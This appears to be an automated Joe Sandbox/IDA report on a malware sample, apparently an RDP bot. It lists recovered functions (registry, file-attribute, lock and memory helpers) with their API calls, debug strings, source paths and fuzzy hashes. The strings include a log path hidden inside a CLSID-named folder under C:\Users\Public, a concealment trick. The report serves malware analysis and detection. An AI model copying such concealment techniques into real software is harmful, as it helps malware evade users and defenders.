Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: CloseCreate
String ID: (key != NULL)$(root != NULL)$?$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
API String ID: 2932200918-412249795
Opcode ID: e247092232c6130ceeddb164c3eff23dd30a03f2928e678fc261eb6db4f7f740
Instruction ID: 21d7bbd0d52dc7eabb092a351198ed1e042b1c4278febea800ef09cd2aaee2d3
Opcode Fuzzy Hash: e247092232c6130ceeddb164c3eff23dd30a03f2928e678fc261eb6db4f7f740
Instruction Fuzzy Hash: D451F062E0CE9391FB318B8AE940BBC6259AF147B4F4601BAD84D472B8DF6DED44C740

Function 00007FFE11506815 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE11506840
strlen.MSVCRT ref: 00007FFE11506869
strlen.MSVCRT ref: 00007FFE11506875
strlen.MSVCRT ref: 00007FFE1150688B

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115068D3, 00007FFE11506903, 00007FFE11506933
[I] (%s) -> Done(path=%s,path_sz=%llu), xrefs: 00007FFE115068A0
((*path_sz) > 0), xrefs: 00007FFE11506925
NULL, xrefs: 00007FFE1150699F
(path != NULL), xrefs: 00007FFE115068C5
[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x), xrefs: 00007FFE1150696D
fs_path_temp, xrefs: 00007FFE11506899, 00007FFE115068CC, 00007FFE115068FC, 00007FFE1150692C, 00007FFE11506966
(path_sz != NULL), xrefs: 00007FFE115068F5
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE115068BE, 00007FFE115068EE, 00007FFE1150691E

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen
String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
API String ID: 39653677-3852240402
Opcode ID: 0d6f832da30618db4b5d4fa9a209532a715be4f109d4233185bf4af6c46cf1be
Instruction ID: 6baded20d3ae3d3779f19790db304e04ae59d09a08d6c7a1fccc76557bdb1f5f
Opcode Fuzzy Hash: 0d6f832da30618db4b5d4fa9a209532a715be4f109d4233185bf4af6c46cf1be
Instruction Fuzzy Hash: 15419EA1A0CE4391FB129F96E4403FC675ABF413A8F9845B6D99E076B5DF3CE6068310

Function 00007FF76A906E31 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF76A906EF6
GetProcessHeap.KERNEL32 ref: 00007FF76A906F04
HeapAlloc.KERNEL32 ref: 00007FF76A906F15
strlen.MSVCRT ref: 00007FF76A906F33
GetProcessHeap.KERNEL32 ref: 00007FF76A906F61
HeapFree.KERNEL32 ref: 00007FF76A906F72

Strings

(buf_sz != NULL), xrefs: 00007FF76A906ECD
mem_alloc, xrefs: 00007FF76A906F80
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF76A906E96, 00007FF76A906EC6
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A906EAB, 00007FF76A906EDB
ini_get_bytes, xrefs: 00007FF76A906EA4, 00007FF76A906ED4
(buf != NULL), xrefs: 00007FF76A906E9D
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF76A906F87

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Heap$Processstrlen$AllocFree
String ID: (buf != NULL)$(buf_sz != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
API String ID: 1318626975-3508512667
Opcode ID: da587c79dbe917f76734759ab2676bea6474a8d68aac5a99633f8add96539cc3
Instruction ID: 1f9b9b2d9fa5b47e565563fa39e61c6272a24851cde7bafb4e656f138a594ab5
Opcode Fuzzy Hash: da587c79dbe917f76734759ab2676bea6474a8d68aac5a99633f8add96539cc3
Instruction Fuzzy Hash: 22311D61A0CB47C9FA52BB11E8003B9A2A0AF41BC4FA440F5EA4DD7695DF7CE955C360

Function 00007FFE11507C31 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE11507CF6
GetProcessHeap.KERNEL32 ref: 00007FFE11507D04
HeapAlloc.KERNEL32 ref: 00007FFE11507D15
strlen.MSVCRT ref: 00007FFE11507D33
GetProcessHeap.KERNEL32 ref: 00007FFE11507D61
HeapFree.KERNEL32 ref: 00007FFE11507D72

Strings

ini_get_bytes, xrefs: 00007FFE11507CA4, 00007FFE11507CD4
mem_alloc, xrefs: 00007FFE11507D80
(buf != NULL), xrefs: 00007FFE11507C9D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11507CAB, 00007FFE11507CDB
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11507C96, 00007FFE11507CC6
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11507D87
(buf_sz != NULL), xrefs: 00007FFE11507CCD

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$Processstrlen$AllocFree
String ID: (buf != NULL)$(buf_sz != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
API String ID: 1318626975-3508512667
Opcode ID: 0bc9325c8b3e7868e1601da2b2f9260856c9ceb67730c1331099926d685bb0c7
Instruction ID: 13b30764f603931cf1cf0063b8ac0b605a717ecb1ac5b88c94dcde38eca43e21
Opcode Fuzzy Hash: 0bc9325c8b3e7868e1601da2b2f9260856c9ceb67730c1331099926d685bb0c7
Instruction Fuzzy Hash: E7316D61A09E4385FB529BA3E8403BD2369AF40BA4F5840B6D98E477B5DF7CE906C350

Function 00007FF76A901AA4 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF76A901B7E

Part of subcall function 00007FF76A901849: GetFileAttributesA.KERNEL32 ref: 00007FF76A90186A

SetFileAttributesA.KERNEL32 ref: 00007FF76A901AEB

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A901B1E, 00007FF76A901B49
[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FF76A901B95
NULL, xrefs: 00007FF76A901CB4
(path != NULL), xrefs: 00007FF76A901B10
fs_attr_set, xrefs: 00007FF76A901B17, 00007FF76A901B42, 00007FF76A901B8E, 00007FF76A901C5D, 00007FF76A901CC3
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FF76A901CCA
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A901B09, 00007FF76A901B34
(attr != NULL), xrefs: 00007FF76A901B3B
[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x), xrefs: 00007FF76A901C64

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: AttributesFile$ErrorLast
String ID: (attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
API String ID: 365566950-3523202656
Opcode ID: ed5ed36b059e511eb2f8f5c8c9b7c33a9d6a062b629e207089bcb294ad6d5c75
Instruction ID: 586ef1ff59c84121c4b39821e7ed3ac96f606879bfef479da3b4ace2e22c2914
Opcode Fuzzy Hash: ed5ed36b059e511eb2f8f5c8c9b7c33a9d6a062b629e207089bcb294ad6d5c75
Instruction Fuzzy Hash: 28516F61A0C747C6FB61BB14A480279F250AF423CCFF141BAD95EC6698EE2CE885C731

Function 00007FFE11503DC4 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFE11503E9E

Part of subcall function 00007FFE11503B69: GetFileAttributesA.KERNEL32 ref: 00007FFE11503B8A

SetFileAttributesA.KERNEL32 ref: 00007FFE11503E0B

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11503E3E, 00007FFE11503E69
(attr != NULL), xrefs: 00007FFE11503E5B
fs_attr_set, xrefs: 00007FFE11503E37, 00007FFE11503E62, 00007FFE11503EAE, 00007FFE11503F7D, 00007FFE11503FE3
NULL, xrefs: 00007FFE11503FD4
(path != NULL), xrefs: 00007FFE11503E30
[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x), xrefs: 00007FFE11503F84
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FFE11503FEA
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11503E29, 00007FFE11503E54
[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FFE11503EB5

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: AttributesFile$ErrorLast
String ID: (attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
API String ID: 365566950-3523202656
Opcode ID: a91ea276b69403569ff7b9c13ec786870b481035977750bd3e95e535872ba10d
Instruction ID: 0d4f42c4be8f330c2a0ba00b6c254f29a88322580f0c992a71c764629e22c00a
Opcode Fuzzy Hash: a91ea276b69403569ff7b9c13ec786870b481035977750bd3e95e535872ba10d
Instruction Fuzzy Hash: 9C51E560A0CE439DF7A08B93E44027E36699F00774F1055BEE9AE866B6DF2CE845C701

Function 00007FF76A9051B8 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyExA.ADVAPI32 ref: 00007FF76A9051DB

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

registry_delete_key, xrefs: 00007FF76A9051F1, 00007FF76A905224, 00007FF76A905254, 00007FF76A905286, 00007FF76A9052AD
(key != NULL), xrefs: 00007FF76A90524D
NULL, xrefs: 00007FF76A9053E8
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FF76A9051F8
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A90522B, 00007FF76A90525B
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF76A905216, 00007FF76A905246
[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF76A9052B4
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FF76A90528D
(root != NULL), xrefs: 00007FF76A90521D
u, xrefs: 00007FF76A90523E

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Deletefflushfwrite
String ID: (key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_delete_key$u
API String ID: 2939363742-2883486457
Opcode ID: 5db890f9e46c202e1258f0c20e4cbb3838a38e3a355a7e4acfa4327e2c6da60f
Instruction ID: 220106d143a4dba36619202367bd263dac9c8791f90c9e01dd7367ea506075ec
Opcode Fuzzy Hash: 5db890f9e46c202e1258f0c20e4cbb3838a38e3a355a7e4acfa4327e2c6da60f
Instruction Fuzzy Hash: 78413B62D0C313D9FA21B648A4407BCD2506F01BD4FF981FAC99DE7690DE6CAD8583A1

Function 00007FF76A904175 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 113fileCOMMON

Download Yara Rule

APIs

UnlockFileEx.KERNEL32(?,?,?,?,?,?,00000000,000001DE38FB13D0,?,00007FF76A9089CF,?,?,00000000,00007FF76A908CE3), ref: 00007FF76A9041BD
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,000001DE38FB13D0,?,00007FF76A9089CF,?,?,00000000,00007FF76A908CE3), ref: 00007FF76A9041CE

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000001DE38FB13D0,?,00007FF76A9089CF,?,?,00000000,00007FF76A908CE3), ref: 00007FF76A904284

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A904213, 00007FF76A904244
fs_file_unlock, xrefs: 00007FF76A9041D7, 00007FF76A90420C, 00007FF76A90423D, 00007FF76A904268, 00007FF76A904292
((*lock) != INVALID_HANDLE_VALUE), xrefs: 00007FF76A904236
(lock != NULL), xrefs: 00007FF76A904205
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A9041FE, 00007FF76A90422F
[E] (%s) -> Failed(lock=%p,err=%08x), xrefs: 00007FF76A90426F
[I] (%s) -> Done(lock=%p), xrefs: 00007FF76A9041DE
[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu), xrefs: 00007FF76A904299

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: CloseErrorFileHandleLastUnlockfflushfwrite
String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
API String ID: 497672076-345319545
Opcode ID: 79864a9b3b9f3dc1cedf9f313fdd16b145c9a36e0152559ce9b0fc825d097d0b
Instruction ID: e40583c1de92339cfca9347f9f637535324f4788106535498d19e469738300db
Opcode Fuzzy Hash: 79864a9b3b9f3dc1cedf9f313fdd16b145c9a36e0152559ce9b0fc825d097d0b
Instruction Fuzzy Hash: C0417D61B0C743D5FA21A718F5406B892506FE57D8FF002BAC47DD76D0EE3CA9858725

Function 00007FFE11506495 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 113fileCOMMON

Download Yara Rule

APIs

UnlockFileEx.KERNEL32 ref: 00007FFE115064DD
CloseHandle.KERNEL32 ref: 00007FFE115064EE

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

GetLastError.KERNEL32 ref: 00007FFE115065A4

Strings

[I] (%s) -> Done(lock=%p), xrefs: 00007FFE115064FE
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11506533, 00007FFE11506564
[E] (%s) -> Failed(lock=%p,err=%08x), xrefs: 00007FFE1150658F
fs_file_unlock, xrefs: 00007FFE115064F7, 00007FFE1150652C, 00007FFE1150655D, 00007FFE11506588, 00007FFE115065B2
(lock != NULL), xrefs: 00007FFE11506525
[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu), xrefs: 00007FFE115065B9
((*lock) != INVALID_HANDLE_VALUE), xrefs: 00007FFE11506556
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE1150651E, 00007FFE1150654F

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: CloseErrorFileHandleLastUnlockfflushfwrite
String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
API String ID: 497672076-345319545
Opcode ID: 3cde496f8fe1cea806b8acfa1f4d21fd2e944fc8d41c11cee32b443d30cf7dcb
Instruction ID: 9358edcc6c1e57e2873ed43b3e4bfa873f76f9faa1fbb6edd9431a3ca86f9706
Opcode Fuzzy Hash: 3cde496f8fe1cea806b8acfa1f4d21fd2e944fc8d41c11cee32b443d30cf7dcb
Instruction Fuzzy Hash: 1B4170A0F1CD4381FB214B97F680ABC27596F517B8FA442B6C41E075F4AE2DE9458712

Function 00007FF76A908EC2 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 80COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 00007FF76A908EE5
GetLastError.KERNEL32 ref: 00007FF76A908F2C

Strings

[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu), xrefs: 00007FF76A908F3E
P, xrefs: 00007FF76A908FAF
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A908F19
;, xrefs: 00007FF76A908EFC
, xrefs: 00007FF76A908F4A
(mi != NULL), xrefs: 00007FF76A908F0B
~, xrefs: 00007FF76A908FAA
H:/Projects/rdp/bot/codebase/sys.c, xrefs: 00007FF76A908F04
sys_mem_info, xrefs: 00007FF76A908F12, 00007FF76A908F37

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: ErrorGlobalLastMemoryStatus
String ID: $(mi != NULL)$;$H:/Projects/rdp/bot/codebase/sys.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu)$sys_mem_info$~
API String ID: 3848946878-1815531218
Opcode ID: 992c4d4525d5bd7699dbef2775a21cd18ee56e9338e2105a6f9fefd9d462d6c8
Instruction ID: 78eb39fbfef68be08a35c85b5282f8d85312fcbc1cc57798dc41f35b2efaae17
Opcode Fuzzy Hash: 992c4d4525d5bd7699dbef2775a21cd18ee56e9338e2105a6f9fefd9d462d6c8
Instruction Fuzzy Hash: EA310F50F0C383C6FBA5B7689480379F2509F54388FB091BAC60E865D2DE6D6D85D369

Function 00007FF76A904972 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104,?,00000104,RDP-Controller.lock,00007FF76A904AD5,?,?,?,?,?,000001DE38FB13D0,00007FF76A904BE5), ref: 00007FF76A9049A1
GetLastError.KERNEL32(?,?,00000104,?,00000104,RDP-Controller.lock,00007FF76A904AD5,?,?,?,?,?,000001DE38FB13D0,00007FF76A904BE5), ref: 00007FF76A9049AC

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A904A38, 00007FF76A904A68, 00007FF76A904A9B
(path != NULL), xrefs: 00007FF76A904A5A
(path_sz != NULL), xrefs: 00007FF76A904A8D
[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu), xrefs: 00007FF76A9049CB
fs_module_path, xrefs: 00007FF76A9049C4, 00007FF76A9049FD, 00007FF76A904A31, 00007FF76A904A61, 00007FF76A904A94
(hnd != NULL), xrefs: 00007FF76A904A2A
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A904A23, 00007FF76A904A53, 00007FF76A904A86
[E] (%s) -> Failed(hnd=0x%p,err=%08x), xrefs: 00007FF76A904A04
RDP-Controller.lock, xrefs: 00007FF76A904972

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$RDP-Controller.lock$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path
API String ID: 2776309574-725851072
Opcode ID: e73b41e6b0ade8854d3c53aa8d2ac3d56b2463943f3118e37cc190388dc7f530
Instruction ID: 533e0855f5a9505c196ed85e2642288c91215365acaec9ccae051315757ef096
Opcode Fuzzy Hash: e73b41e6b0ade8854d3c53aa8d2ac3d56b2463943f3118e37cc190388dc7f530
Instruction Fuzzy Hash: 42317C61A08B17D9FB12AB14E8403B4A294BF607C8FF440BAD95CC71A1EE3DAD45C730

Function 00007FFE11506C92 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FFE11506CC1
GetLastError.KERNEL32 ref: 00007FFE11506CCC

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11506D58, 00007FFE11506D88, 00007FFE11506DBB
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log, xrefs: 00007FFE11506C94
fs_module_path, xrefs: 00007FFE11506CE4, 00007FFE11506D1D, 00007FFE11506D51, 00007FFE11506D81, 00007FFE11506DB4
(path != NULL), xrefs: 00007FFE11506D7A
[E] (%s) -> Failed(hnd=0x%p,err=%08x), xrefs: 00007FFE11506D24
